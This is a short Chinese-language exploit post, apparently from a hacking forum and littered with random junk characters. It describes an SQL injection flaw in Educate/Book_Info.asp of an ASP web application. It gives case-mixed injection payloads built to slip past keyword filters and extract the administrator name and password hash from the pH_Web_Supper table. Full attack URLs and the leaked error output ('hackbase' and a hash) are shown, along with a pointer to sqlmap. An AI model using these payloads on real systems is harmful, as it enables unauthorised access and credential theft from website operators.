漏洞出现在Educate/Book_Info.asp
6 [1 P& l% ?( c/ Z. e0 h
7 o+ C; k$ F6 [. I& K$ C! Z此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 h |& v( y7 m& N6 o ( X6 @/ j' U" A7 q x5 H9 d+ W) n
exp:如下0 w- W2 @; G. j
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). Q0 \2 ~9 o0 L. U
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)6 x; e' }4 U% I/ b. c( t8 p2 l
, y# [2 L `1 S+ S+ V& h8 E3 R+ Q4 X/ `" A
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
; h4 s. W& a" ~* g6 m* t5 f" o7 W
6 i1 \ j3 [: K5 j# w- J1 \( U. pMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'! H% G% G0 C% ?/ j4 Q$ i
6 E+ Z( a) F' ^- k) V
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。4 V4 w8 h% U" u* P2 a
$ Q- X+ x: L5 z% V/Educate/Book_Info.asp,行 8
# G" D! ]' a; x. [$ ~6 } % y& z; W1 Y) X8 X$ n
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. v. u5 F5 x% [. `* F
0 C) O: `3 a+ CMicrosoft OLE DB Provider for SQL Server 错误 '80040e07', X1 W1 h2 G+ F- k& }
: e8 U; ]+ i: ~4 |1 C将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。, S5 O' G( k. m3 t
6 n3 }9 D9 v- r
/Educate/Book_Info.asp,行 8
: l- {! Y, w# W% q8 H. N1 S$ w! @ |